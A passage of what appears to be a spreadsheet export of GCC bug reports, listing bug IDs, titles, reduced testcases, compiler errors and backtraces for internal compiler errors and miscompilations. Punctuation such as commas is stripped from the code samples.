	movups	%xmm15 -88(%rbp)
	.cfi_escape 0x100x200x30x760xa80x7f
	jne	.L5
	movups	-328(%rbp) %xmm0
	movups	-312(%rbp) %xmm1
	movups	-296(%rbp) %xmm2
	movups	-280(%rbp) %xmm3
	movups	-264(%rbp) %xmm4
	movups	-248(%rbp) %xmm5
	movups	-232(%rbp) %xmm6
	movups	-216(%rbp) %xmm7
	movups	-200(%rbp) %xmm8
	movups	-184(%rbp) %xmm9
	movups	-168(%rbp) %xmm10
	movups	-152(%rbp) %xmm11
	movups	-136(%rbp) %xmm12
	movups	-120(%rbp) %xmm13
	movups	-104(%rbp) %xmm14
	movups	-88(%rbp) %xmm15
	addq	$264 %rsp
	.cfi_remember_state
	.cfi_restore 31
	.cfi_restore 30
	.cfi_restore 29
	.cfi_restore 28
	.cfi_restore 27
	.cfi_restore 26
	.cfi_restore 25
	.cfi_restore 24
	.cfi_restore 23
	.cfi_restore 22
	.cfi_restore 21
	.cfi_restore 20
	.cfi_restore 19
	.cfi_restore 18
	.cfi_restore 17
	popq	%rax
	popq	%rdx
	popq	%rcx
	popq	%rsi
	popq	%rdi
	popq	%r8
	popq	%r9
	popq	%r10
	popq	%r11
	popq	%rbp
	leaq	-16(%r13) %rsp
	.cfi_def_cfa 7 16
	popq	%r13
	.cfi_def_cfa_offset 8
	iret
.L5:
	.cfi_restore_state
	call	abort
	.cfi_endproc
.LFE0:
	.size	fn .-fn
	.comm	ip88
	.comm	error88
	.ident	GCC: (GNU) 6.0.0 20151020 (experimental)
	.section	.note.GNU-stack@progbits
[hjl@gnu-6 interrupt-9]$ 
We need something like
/* Can't use DRAP in interrupt function.  */
if (cfun-&gt;machine-&gt;func_type != TYPE_NORMAL)
  sorry (Dynamic Realign Argument Pointer (DRAP) not supported in 
         interrupt service routine.  This may be worked around by 
         adding -maccumulate-outgoing-args.)
in ix86_expand_prologue.</t>
  </si>
  <si>
    <t>GCC-14029</t>
  </si>
  <si>
    <t>[4.0 Regression] Miscompilation of unrolled loop due to Iterator::base having an aliasing problem</t>
  </si>
  <si>
    <t>Following code (sorry still contains STL but I did a lot of trimming 
already) gives a wrong result when optimization is enabled: 
#include  
#include  
struct a { 
  int n 
  bool operator==(a const  } 
} 
int main() { 
  a a1 std::vector  as 
  a1.n = 4 for (int i=0 i&lt;4 ++i) as.push_back(a1) 
  a1.n = 7 as.push_back(a1) 
  return std::find(as.begin() as.end() a1) == as.end() 
} 
Reading specs 
from /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/specs 
Configured with: /esat/firenze/tmp/src/gcc/ssa/configure --program-suffix=-ssa 
--prefix=/esat/olympia/install --enable-languages=cc++ 
Thread model: posix 
gcc version 3.5-tree-ssa 20040204 (merged 20040126) 
 /esat/olympia/install/libexec/gcc/i686-pc-linux-gnu/3.5-tree-ssa/cc1plus 
-quiet -v -D_GNU_SOURCE tst.cpp -quiet -dumpbase tst.cpp -mtune=pentiumpro 
-auxbase tst -O9 -version -o /tmp/ccQc86SB.s 
ignoring nonexistent directory 
/esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/../../../../i686-pc-linux-gnu/include 
#include ... search starts here: 
#include  search starts here: 
 /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/../../../../include/c++/3.5-tree-ssa 
 /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/../../../../include/c++/3.5-tree-ssa/i686-pc-linux-gnu 
 /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/../../../../include/c++/3.5-tree-ssa/backward 
 /usr/local/include 
 /esat/olympia/install/include 
 /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/include 
 /usr/include 
End of search list. 
GNU C++ version 3.5-tree-ssa 20040204 (merged 20040126) (i686-pc-linux-gnu) 
        compiled by GNU C version 3.3.1. 
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096 
 as -V -Qy -o /tmp/cco9g0GA.o /tmp/ccQc86SB.s 
GNU assembler version 2.14 (i686-pc-linux-gnu) using BFD version 2.14 20030612 
 /esat/olympia/install/libexec/gcc/i686-pc-linux-gnu/3.5-tree-ssa/collect2 
--eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o 
tst /usr/lib/crt1.o /usr/lib/crti.o /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/crtbegin.o 
-L/esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa 
-L/esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/../../.. /tmp/cco9g0GA.o 
-lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s 
-lgcc /esat/olympia/install/lib/gcc/i686-pc-linux-gnu/3.5-tree-ssa/crtend.o /usr/lib/crtn.o</t>
  </si>
  <si>
    <t>GCC-34445</t>
  </si>
  <si>
    <t>[4.3 Regression] internal compiler error: in cost_for_stmt at tree-vect-transform.c:98</t>
  </si>
  <si>
    <t>A new build of gfortran on the Intel Macintosh now gets this error -
[dir-2:~/junk/ad] dir% gfortran -O3 -c derv.f
derv.f: In function 'derv':
derv.f:1: internal compiler error: in cost_for_stmt at tree-vect-transform.c:98
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[dir-2:~/junk/ad] dir% cat derv.f
      subroutine derv (xxbbvdetrstndoptcosxythickedis
     1                  vnivnt)
      implicit real*8 (a-ho-z)
      save
c
      common /shell1/ disd(9)ieldielpnptidwndrot
      common /shell4/xji(33)p(332)h(32)
c
      dimension xx(3*)ndopt(*)bv(*)vni(*)cosxy(6*)vnt(*)
     1          edis(*)thick(*)b(*)
c
      kk=0
      k2=0
      do 130 k=1ield
      k2=k2 + 3
      if (ndopt(k)) 127127130
  127 kk=kk + 1
      do 125 i=13
      b(k2+i)=b(k2+i) + (xji(i1)*p(1k) + xji(i2)*p(2k))*t
     1         + xji(i3)*h(k)
      th=0.5*thick(kk)
      b(k2+i+3)=b(k2+i+3) - th*cosxy(i+3kk)
  125 b(k2+i+6)=b(k2+i+6) + th*cosxy(ikk)
      k2=k2 + 9
  130 continue
      return
      end
[dir-2:~/junk/ad] dir% gfortran --v
Using built-in specs.
Target: i386-apple-darwin8.11.1
Configured with: ../gcc/configure --disable-bootstrap --enable-multilib --prefix=/usr/local/gfortran --enable-languages=cfortran
Thread model: posix
gcc version 4.3.0 20071212 (experimental) (GCC)</t>
  </si>
  <si>
    <t>dorit</t>
  </si>
  <si>
    <t>GCC-59153</t>
  </si>
  <si>
    <t>ICE: in memory_address_length at config/i386/i386.c:24617 with -O -flive-range-shrinkage -mdispatch-scheduler -march=bdver1</t>
  </si>
  <si>
    <t>Created attachment 31230
reduced testcase
Compiler output:
$ gcc -O -flive-range-shrinkage -mdispatch-scheduler -march=bdver1 testcase.c 
testcase.c: In function 'foo':
testcase.c:5:1: internal compiler error: in memory_address_length at config/i386/i386.c:24617
 }
 ^
0xd97f06 memory_address_length(rtx_def* bool)
        /mnt/svn/gcc-trunk/gcc/config/i386/i386.c:24617
0xdc4943 insn_default_length(rtx_def*)
        /mnt/svn/gcc-trunk/gcc/config/i386/i386.md:631
0xd6dc30 min_insn_size
        /mnt/svn/gcc-trunk/gcc/config/i386/i386.c:36340
0xd6ee2f add_to_dispatch_window
        /mnt/svn/gcc-trunk/gcc/config/i386/i386.c:43215
0xd6ee2f do_dispatch
        /mnt/svn/gcc-trunk/gcc/config/i386/i386.c:43381
0x12d1de3 schedule_block(basic_block_def** void*)
        /mnt/svn/gcc-trunk/gcc/haifa-sched.c:6262
0xa734a7 schedule_region
        /mnt/svn/gcc-trunk/gcc/sched-rgn.c:3057
0xa734a7 schedule_insns
        /mnt/svn/gcc-trunk/gcc/sched-rgn.c:3393
0xa7389b schedule_insns
        /mnt/svn/gcc-trunk/gcc/sched-rgn.c:3378
0xa7389b rest_of_handle_live_range_shrinkage
        /mnt/svn/gcc-trunk/gcc/sched-rgn.c:3587
0xa7389b execute
        /mnt/svn/gcc-trunk/gcc/sched-rgn.c:3677
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gcc -v                                                                      
Using built-in specs.
COLLECT_GCC=/mnt/svn/gcc-trunk/binary-latest/bin/gcc
COLLECT_LTO_WRAPPER=/mnt/svn/gcc-trunk/binary-204897-lto-fortran-checking-yes-rtl-df/libexec/gcc/x86_64-unknown-linux-gnu/4.9.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /mnt/svn/gcc-trunk//configure --enable-checking=yesrtldf --enable-languages=cc++ltofortran --prefix=/mnt/svn/gcc-trunk/binary-204897-lto-fortran-checking-yes-rtl-df/ --without-cloog --without-ppl
Thread model: posix
gcc version 4.9.0 20131116 (experimental) (GCC) 
Tested revisions:
r204897 - crash
4.8 - doesn't know -flive-range-shrinkage</t>
  </si>
  <si>
    <t>GCC-43024</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE on template code with -O2 or -O3 regression from 4.4.2</t>
  </si>
  <si>
    <t>Upgrading from 4.4.2 to 4.4.3 gcc now segfaults when compiling my file. I've narrowed both the command line and the cpp file (30 lines visible at the end of the *.ii attached). Most of the included code is from eigen (http://eigen.tuxfamily.org/) and is publicly visible on 
http://bitbucket.org/eigen/eigen
When compiled with -O2 or -O3 the segfaults is triggered without -O option the file compiles fine.
The complete line i use is:
g++ -c -O3 -I../../eigen2-tip -o ice.o ice.cpp -save-temps
The output is:
----------------------------------------------------------------------------
In file included from ../../eigen2-tip/Eigen/Core:178
                 from ../../eigen2-tip/unsupported/Eigen/NonLinearOptimization:29
                 from ice.cpp:3:
../../eigen2-tip/Eigen/src/Core/DenseStorageBase.h: In member function â€˜Eigen::LevenbergMarquardtSpace::Status Eigen::LevenbergMarquardt::minimizeOneStep(Eigen::Matrix&amp; int) [with FunctorType = myFunctor Scalar = double]â€™:            
../../eigen2-tip/Eigen/src/Core/DenseStorageBase.h:516: internal compiler error: Segmentation fault
Please submit a full bug report with preprocessed source if appropriate.
See  for instructions.  
----------------------------------------------------------------------------
The output of gcc -v is (i'm using gentoo) :
----------------------------------------------------------------------------
Using built-in specs.
Target: x86_64-pc-linux-gnu
Configured with: /usr/data/tmp/portage/sys-devel/gcc-4.4.3/work/gcc-4.4.3/configure --prefix=/usr --bindir=/usr/x86_64-pc-linux-gnu/gcc-bin/4.4.3 --includedir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.4.3/include --datadir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.4.3 --mandir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.4.3/man --infodir=/usr/share/gcc-data/x86_64-pc-linux-gnu/4.4.3/info --with-gxx-include-dir=/usr/lib/gcc/x86_64-pc-linux-gnu/4.4.3/include/g++-v4 --host=x86_64-pc-linux-gnu --build=x86_64-pc-linux-gnu --disable-altivec --disable-fixed-point --without-ppl --without-cloog --enable-nls --without-included-gettext --with-system-zlib --disable-checking --disable-werror --enable-secureplt --enable-multilib --enable-libmudflap --disable-libssp --enable-libgomp --enable-cld --with-python-dir=/share/gcc-data/x86_64-pc-linux-gnu/4.4.3/python --disable-libgcj --enable-languages=cc++ --enable-shared --enable-threads=posix --enable-__cxa_atexit --enable-clocale=gnu --with-bugurl=http://bugs.gentoo.org/ --with-pkgversion='Gentoo 4.4.3 p1.0'
Thread model: posix
gcc version 4.4.3 (Gentoo 4.4.3 p1.0)
----------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>orzel</t>
  </si>
  <si>
    <t>GCC-12928</t>
  </si>
  <si>
    <t>[tree-ssa] Bad assembly code produced when compiling glibc</t>
  </si>
  <si>
    <t>GCC version:
    gcc (GCC) 3.5-tree-ssa 20031106 (merged 20031026)
GCC configure options:
    --prefix=/notnfs/bbooth/tree-ssa/i686/inst
    --srcdir=/notnfs/bbooth/tree-ssa/gcc
    --disable-multilib
Command line &amp; compiler/assembler output:
/notnfs/bbooth/tree-ssa/i686/inst/libexec/gcc/i686-pc-linux-gnu/3.5-tree-ssa/cc1
-fpreprocessed sigsuspend.i -quiet -dumpbase sigsuspend.c -mtune=pentiumpro
-auxbase-strip /home/bbooth/tree-ssa/build/i686/GLIBC/signal/sigsuspend.o -O2
-Wall -Winline -Wstrict-prototypes -Wwrite-strings -version -ftime-report -o
sigsuspend.s
GNU C version 3.5-tree-ssa 20031106 (merged 20031026) (i686-pc-linux-gnu)
	compiled by GNU C version 3.5-tree-ssa 20031106 (merged 20031026).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Execution times (seconds)
 lexical analysis      :   0.01 (14%) usr   0.00 ( 0%) sys   0.01 (11%) wall
 parser                :   0.02 (29%) usr   0.00 ( 0%) sys   0.02 (22%) wall
 tree gimplify         :   0.01 (14%) usr   0.00 ( 0%) sys   0.01 (11%) wall
 bypass jumps          :   0.01 (14%) usr   0.00 ( 0%) sys   0.01 (11%) wall
 symout                :   0.01 (14%) usr   0.00 ( 0%) sys   0.01 (11%) wall
 TOTAL                 :   0.07             0.02             0.09
 as -V -Qy -o /home/bbooth/tree-ssa/build/i686/GLIBC/signal/sigsuspend.o
sigsuspend.s
GNU assembler version 2.14.90.0.4 (i386-redhat-linux) using BFD version
2.14.90.0.4 20030523
sigsuspend.s: Assembler messages:
sigsuspend.s:83: Error: non-constant expression in .if statement
sigsuspend.s:84: Error: non-constant expression in .if statement
sigsuspend.s:87: Error: non-constant expression in .if statement
==============
.i file to come.</t>
  </si>
  <si>
    <t>bbooth</t>
  </si>
  <si>
    <t>GCC-5859</t>
  </si>
  <si>
    <t>gdb fails to break in C++ MPI code</t>
  </si>
  <si>
    <t>The gdb debugger fails to break on the symbol MPI_Init
in a trivial MPI code written in C++.  The code uses the
mpich package from Argonne National Laboratory and is 
compiled using mpiCC a script that invokes the g++ compiler
and links with libmpich.a.  The code is executed using 
mpirun and the -gdb flag which causes gdb to set a 
breakpoint at MPI_Init and run the program.  
The problem is triggered by any C++ MPI code that utilizes 
C++ streams for example to write something to std::cout.
In this case the code will run through all of main() and
stop inside the global object destructor phase.  With no
usage of C++ streams the code halts at MPI_Init as it 
should.  Also a comparable MPI code written in C functions
properly with gdb.
I am reporting this as a gcc bug because it does not happen
with gcc 2.96.  It seems that something has changed with
respect to the C++ standard library and streams that makes
debugging of MPI codes with gdb no longer possible.
Release:
3.0
Environment:
i686 running Linux 2.4.9-ac9
How-To-Repeat:
You will need to have a recent version of mpich
installed (http://www.mcs.anl.gov/mpi/mpich).  I am using 
mpich-1.2.1.  With this installed build my example code
with the command mpiCC -g -o cctest main.cc.  Then run it
on a single processor for example with the command
mpirun -np 1 ./cctest.  Now try to run it under the gdb
debugger by adding the flag -gdb to the mpirun command.
You should see that the code does not break at MPI_Init
as expected.</t>
  </si>
  <si>
    <t>cummings</t>
  </si>
  <si>
    <t>GCC-51911</t>
  </si>
  <si>
    <t>[C++11] G++ accepts new auto { list }</t>
  </si>
  <si>
    <t>If the auto type-specifier appears in the type-specifier-seq of a new-type-id or type-id of a new-expression the new-expression shall contain a new-initializer of the form ( assignment-expression )
So this shouldn't compile:
#include 
int main()
{
    auto foo = new auto {3 4 5}
}</t>
  </si>
  <si>
    <t>GCC-65886</t>
  </si>
  <si>
    <t>[5/6 Regression] Copy reloc in PIE incompatible with DSO created by -Wl-Bsymbolic</t>
  </si>
  <si>
    <t>Copy relocation in PIE is incompatible with DSO created with -Wl-Bsymbolic:
[hjl@gnu-tools-1 copyreloc-2]$ cat x.c 
extern int a
extern int *a_p (void)
extern void bar (void)
extern void *bar_p (void)
int main()
{
  if (bar_p () != &amp;bar)
    __builtin_abort()
  if (a_p () != &amp;a)
    __builtin_abort()
  bar ()
  if (a != 30)
    __builtin_abort()
  return 0
}
[hjl@gnu-tools-1 copyreloc-2]$ cat bar.c
int a
void
bar ()
{
  a = 30
}
void *
bar_p ()
{
  return 
}
int *
a_p ()
{
  return 
}
[hjl@gnu-tools-1 copyreloc-2]$ make
/export/build/gnu/gcc-5/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-5/build-x86_64-linux/gcc/ -g -O2 -fPIE   -c -o x.o x.c
/export/build/gnu/gcc-5/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-5/build-x86_64-linux/gcc/ -g -O2 -fPIC   -c -o bar.o bar.c
/export/build/gnu/gcc-5/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-5/build-x86_64-linux/gcc/ -Wl-Bsymbolic -shared -o libbar.so bar.o
/export/build/gnu/gcc-5/build-x86_64-linux/gcc/xgcc -B/export/build/gnu/gcc-5/build-x86_64-linux/gcc/ -pie -o x x.o libbar.so -Wl-rpath.
./x
Makefile:13: recipe for target 'all' failed
make: *** [all] Aborted (core dumped)
[hjl@gnu-tools-1 copyreloc-2]$</t>
  </si>
  <si>
    <t>GCC-83956</t>
  </si>
  <si>
    <t>[8 regression] error: use of deleted function â€˜{anonymous}::a::~a()â€™</t>
  </si>
  <si>
    <t>This issue appear during HHVM build with GCC 8. GCC 7 works fine.
$ cat foo.cpp.i
namespace {
struct a {
  ~a() = delete
}
struct b {
  ~b() {}
  union {
    a c
  }
}
}
$ g++ --version
g++ (GCC) 8.0.1 20180120 (experimental)
Copyright (C) 2018 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ g++ -O3 -o foo.cpp.o -c foo.cpp.i -w
foo.cpp.i: In destructor â€˜{anonymous}::b::~b()â€™:
foo.cpp.i:6:8: error: use of deleted function â€˜{anonymous}::a::~a()â€™
   ~b() {}
        ^
foo.cpp.i:3:3: note: declared here
   ~a() = delete
   ^
Work fine with GCC 7.
$ g++ --version
g++ (GCC) 7.2.1 20180120
Copyright (C) 2017 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
$ g++  -O3 -o foo.cpp.o -c foo.cpp.i -w
$ echo $?
0</t>
  </si>
  <si>
    <t>skpgkp2</t>
  </si>
  <si>
    <t>GCC-16609</t>
  </si>
  <si>
    <t>ICE with private: in make_decl_rtl at varasm.c:758</t>
  </si>
  <si>
    <t xml:space="preserve">
kargl[408] gfortran -c z.f90
z.f90: In function `x':
z.f90:9: internal compiler error: in make_decl_rtl at varasm.c:758
Environment:
System: FreeBSD c-67-168-59-70.client.comcast.net 5.2-CURRENT FreeBSD 5.2-CURRENT #6: Sun Jul 11 10:10:47 PDT 2004 kargl@c-67-168-59-70.client.comcast.net:/usr/obj/usr/src/sys/HOTRATS i386
host: i386-unknown-freebsd5.2
build: i386-unknown-freebsd5.2
target: i386-unknown-freebsd5.2
configured with: ../gcc/configure --prefix=/home/kargl/gcc/work --disable-libmudflap --enable-languages=cf95 : (reconfigured) ../gcc/configure --prefix=/home/kargl/gcc/work --disable-libmudflap --with-gcc-version-trigger=/home/kargl/gcc/gcc/gcc/version.c --enable-languages=cf95 --no-create --no-recursion
How-To-Repeat:
Try to compile
   MODULE Z
     DOUBLE PRECISION PRIVATE PARAMETER :: RBX = 1.D0
     DOUBLE PRECISION ALLOCATABLE PRIVATE:: DD1(:)
     CONTAINS
       SUBROUTINE X
         ALLOCATE (DD1(2))
         DO I = 1 2
           DD1(I) = INT(RBX)
         END DO
       END SUBROUTINE X
   END MODULE Z
with gfortran.</t>
  </si>
  <si>
    <t>GCC-48492</t>
  </si>
  <si>
    <t>[4.7 Regression] LTO bootstrap failure in copy_constant</t>
  </si>
  <si>
    <t>Created attachment 23910
broken patch
../configure --enable-languages=allobj-c++adaltogo --enable-checking=yesrtl --with-build-config=bootstrap-lto
make -j64
fails with:
../../gcc/ada/ali.ads:39:1: internal compiler error: in copy_constant at varasm.c:3030
while linking gnatbind with -flto.
The problem is related to streaming out and in DECL_IN_CONSTANT_POOL var decls
I guess in the original compilation it is streamed out normally but when
it is streamed in tree_output_constant_def isn't called on the DECL_INITIAL
so it isn't registered with varpool and thus when streaming it out again
varpool_get_node returns NULL and we stream the decl with DECL_IN_CONSTANT_POOL
set but DECL_INITIAL being error_mark_node.  When it is streamed in again
and expand_debug_expr calls mark_decl_rtl on it it ICEs because error_mark_node isn't a constant.
I believe we need to stream DECL_IN_CONSTANT_POOL vars specially basically stream just the constants from its DECL_INITIAL and have the stream reader
call tree_output_constant_def for it.  Tried to do this in attached patch but
probably it needs to be done slightly elsewhere perhaps after after caching it or whatever.  Not too familiar with the streamer...</t>
  </si>
  <si>
    <t>GCC-14478</t>
  </si>
  <si>
    <t>[3.3 only] rs6000 geu/ltu patterns generate incorrect code</t>
  </si>
  <si>
    <t>Compiling the following with -O results in a function that always returns zero
instead of one that always returns 1.
int foo (int a unsigned int x)
{
  unsigned int n = 0
  while (a)
    x = x + 1 a = a &lt;&lt; 1
  return x &gt;= n
}</t>
  </si>
  <si>
    <t>GCC-38420</t>
  </si>
  <si>
    <t>gcc.target/i386/pr37248-2.c doesn't work on ia32</t>
  </si>
  <si>
    <t>I got
+FAIL: gcc.target/i386/pr37248-2.c scan-tree-dump optimized &amp; 3758096391[^
+FAIL: gcc.target/i386/pr37248-3.c scan-tree-dump optimized &amp; 3766484487[^
on Fedora 9/ia32. I saw
 Function foo (foo)
Analyzing Edge Insertions.
foo (struct S x)
{
:
 return (BIT_FIELD_REF  
}
0x0e0000007 is the same as 3758096391.</t>
  </si>
  <si>
    <t>GCC-13134</t>
  </si>
  <si>
    <t>[3.4 regression] Visibility attribute is ignored</t>
  </si>
  <si>
    <t>The change to visibility handling that was checked in on Nov 6 seems to have
broken visibility pretty badly.  Setting the visibility attribute on a C
function declaration no longer causes the function to be emitted with the given
visibility.
To reproduce this compile the attached testcase:
gcc -c -o visibility.o visibility.c
and check the output with readelf:
readelf -s visibility.o
It will show visibility DEFAULT for all of the functions in this object file:
    7: 00000000      5 FUNC    GLOBAL DEFAULT        1 func1
    8: 00000005      5 FUNC    GLOBAL DEFAULT        1 func2
    9: 0000000a      5 FUNC    GLOBAL DEFAULT        1 func3
   10: 0000000f      5 FUNC    GLOBAL DEFAULT        1 func4
   11: 00000014      5 FUNC    GLOBAL DEFAULT        1 func5
   12: 00000019      5 FUNC    GLOBAL DEFAULT        1 func6
   13: 0000001e      5 FUNC    GLOBAL DEFAULT        1 func7
   14: 00000023      5 FUNC    GLOBAL DEFAULT        1 func8</t>
  </si>
  <si>
    <t>bryner</t>
  </si>
  <si>
    <t>GCC-17035</t>
  </si>
  <si>
    <t>gnu.java.rmi should not reuse ObjectInputStreams and ObjectOutputStreams between RMI calls</t>
  </si>
  <si>
    <t>gnu.java.rmi tries to reuse ObjectOutputStreams between remote method
invocations which means that second and subsequent invocations in a connection
don't start with the necessary Java serialization magic 0xaced.
This can be clearly seen in pcap.txt in the attached test case which is a
hexdump of packets captured by ethereal. The first invocation starts
50 ac ed 00 05 77 22 00 00
which is correct (note the magic ac ed indicating the start of a serialization
stream). However the second invocation is still using the same
ObjectOutputStream so it starts with:
50 77 22 00 00
which is _not_ correct and hence the Sun VM complains. (However because of a
similar bug with incorrectly reusing the _input_ stream gij is unable to
decipher the error from the Sun VM and thinks the stream is corrupted.)</t>
  </si>
  <si>
    <t>GCC-25010</t>
  </si>
  <si>
    <t>[4.1/4.2 regression] Segmentation fault (infinite recursion in cgraph_clone_inlined_nodes)</t>
  </si>
  <si>
    <t>This bug looks much like 24093 except that it fails on 4.1/4.2
Originally reported by Alexey Maximov 
#pragma interface
struct T
{
  T *p
  void baz ()
  {
    p-&gt;baz ()
  }
}
void foo (T *p)
{
  p-&gt;baz ()
}</t>
  </si>
  <si>
    <t>GCC-5841</t>
  </si>
  <si>
    <t>g++ calls ctors/dtors in wrong order</t>
  </si>
  <si>
    <t xml:space="preserve">  The problem occurs only with c++ and optimization turned on
  (at least -O and -O2). G++ seems to allocate sometimes the same space
  for some temporary c++-Objects on the stack. But with optimization switch
  on it looks like that all destructor calls go to the end of a compilation
  unit not after the temporary object becomes unused. For objects which
  share the same memory the constructors are called first and then all
  the destructors. That is of course not correct. However this is of course
  not always the case just for some szenarios. I extracted a short example
  (included) from a larger project showing the effect. In the example i used
  printf to document the wrong behaviour so dont be disappointed when
  it doesnt crash with segmentation fault as you might hope. In a bigger
  application it likely will i suspect. Program output (for your pleasure):
  without -O:			with -O:
  constructed 0xbffff9b4	constructed 0xbffff9b4
  constructed 0xbffff984	constructed 0xbffff994
  0xbffff984 destructed		constructed 0xbffff9a4
  constructed 0xbffff9a4	constructed 0xbffff994
  constructed 0xbffff984	0xbffff994 destructed
  0xbffff984 destructed		0xbffff9a4 destructed
  0xbffff9a4 destructed		error deleted twice should never be the case
  0xbffff9b4 destructed		0xbffff994 destructed
				0xbffff9b4 destructed
  As one might see the number of addresses for which constructors and 
  destructors called are the same just the order differs. 0xbffff994
  on the right side is constructed twice thereafter destructed twice.
  Using -fno-default-inline also does not show the error. I did not
  check if this bug is in CVS-version of gcc too but it is in 3.0
  up to 3.0.4 and by induction follows it is.
  I had no idea of the priority of this error so i set it to 'medium'.
  Greetings - Rasmus
Release:
3.0.4
Environment:
System: Linux hamburg 2.4.16 #9 Fri Jan 11 14:51:00 CET 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --prefix=/usr --infodir=/usr/share/info --mandir=/usr/share/man --enable-threads
How-To-Repeat:
/*
 * this code uses two classes to reproduce the error. This seems to
 * be necessary. I was not able to get the wrong behaviour with one class
 * but that doesnt mean its not possible. To be shure where the error
 * is located i do not #inlude anything but declared printf by hand.
 * The problem occurred originally in some completely other context
 * so it should not depend on that.
 */
extern C {
int printf (const char * ...)
}
class Double
struct Integer {
  /*
   * living is set by constructor reset by destructor
   * so it should never be 0 at start of destructor.
   */
  int living
  /* some constructors... */
  Integer (const Double &amp;d) {
    living = 1
    printf (constructed %p\n this)
  }
  Integer (int i) {
    living = 1
    printf (constructed %p\n this)
  }
  Integer (const Integer &amp;ref) {
    living = 1
    printf (constructed %p\n this)
  }
  ~Integer () {
    if (living != 1)
      printf (error deleted twice should never be the case\n)
    living = 0
    printf (%p destructed\n this)
  }
}
struct Double {
  Double (Integer i) {}
}
void plus (Integer a Integer b) { }
int main () {
  Integer one (1)
  plus (Integer (Double (one))one)
}</t>
  </si>
  <si>
    <t>GCC-43416</t>
  </si>
  <si>
    <t>[4.4 regression] internal compiler error in C++ template instantiations at -O3</t>
  </si>
  <si>
    <t>I came across some code that previously compiled at -O3 without complaint on gcc version 4.3.0 20080428 (Red Hat 4.3.0-8) and gcc version 4.4.1 (Ubuntu 4.4.1-4ubuntu9) but triggered a segmentation fault on gcc 4.4.3.  After minimization here is the segmentation fault:
$ /net/test-hsa014/wlam/local/gcc-4.4.3/bin/gcc -Wfatal-errors -c -O3 -Wall foo.cc
foo.cc: In member function â€˜void TypeRegistry::registerType(int const ValueType&amp;) [with ValueType = int (*)()]â€™:
foo.cc:119: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ /net/test-hsa014/wlam/local/gcc-4.4.3/bin/g++ -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.4.3/configure --prefix=/net/test-hsa014/wlam/local/gcc-4.4.3 --disable-multilib
Thread model: posix
gcc version 4.4.3 (GCC)
(built from the GNU source distribution though</t>
  </si>
  <si>
    <t>wlam</t>
  </si>
  <si>
    <t>GCC-68988</t>
  </si>
  <si>
    <t>reload_pseudo_compare_func violates qsort requirements</t>
  </si>
  <si>
    <t>One of the comparisons in reload_pseudo_compare_func violates the transitivity axiom (i.e. x  x &lt; z) which is a requirement for proper comparison function. The offending piece is
  if ((diff
       = (ira_reg_class_max_nregs[cl2][lra_reg_info[r2].biggest_mode]
          - ira_reg_class_max_nregs[cl1][lra_reg_info[r1].biggest_mode])) != 0
      /* The code below executes rarely as nregs == 1 in most cases.
         So we should not worry about using faster data structures to
         check reload pseudos.  */
      &amp;&amp; ! bitmap_bit_p (&amp;non_reload_pseudos r1)
      &amp;&amp; ! bitmap_bit_p (&amp;non_reload_pseudos r2))
This one is activated only when non_reload_pseudos is off for both r1 and r2.
Now imagine that we compare non-reload pseudos A B but for reload pseudo C. Then A/B pair will be compared absolutely differently from A/C and B/C pairs. In practice this may lead to violation of transitivity axiom which may puzzle qsort and lead to all sorts of bugs (e.g. unsorted array of pseudos).
For additional details check https://gcc.gnu.org/ml/gcc-patches/2015-12/msg01817.html</t>
  </si>
  <si>
    <t>y.gribov</t>
  </si>
  <si>
    <t>GCC-65533</t>
  </si>
  <si>
    <t>[5 Regression] 252.eon in SPEC CPU 2000 failed to build</t>
  </si>
  <si>
    <t>On Linux/x86-64 r221604 gave
g++ -c -o ggHMatrix3.o   -DSPEC_CPU2000_LP64 -DHAS_ERRLIST    -I. -DNDEBUG     -O3 -funroll-loops -ffast-math   ggHMatrix3.cc
ggHMatrix3.cc: In function 'ggHPoint3 operator*(const ggHMatrix3&amp; const ggHPoint3&amp;)':
ggHMatrix3.cc:303:11: internal compiler error: in quick_push at vec.h:867
 ggHPoint3 operator*(const ggHMatrix3 &amp;m const ggHPoint3 &amp;p) {
           ^
0xedabf3 vec::quick_push(_slp_tree* const&amp;)
	../../src-trunk/gcc/vec.h:867
0xedabf3 vec::quick_push(_slp_tree* const&amp;)
	../../src-trunk/gcc/vec.h:1525
0xedabf3 vec::safe_push(_slp_tree* const&amp;)
	../../src-trunk/gcc/vec.h:1538
0xedabf3 vect_build_slp_tree
	../../src-trunk/gcc/tree-vect-slp.c:955
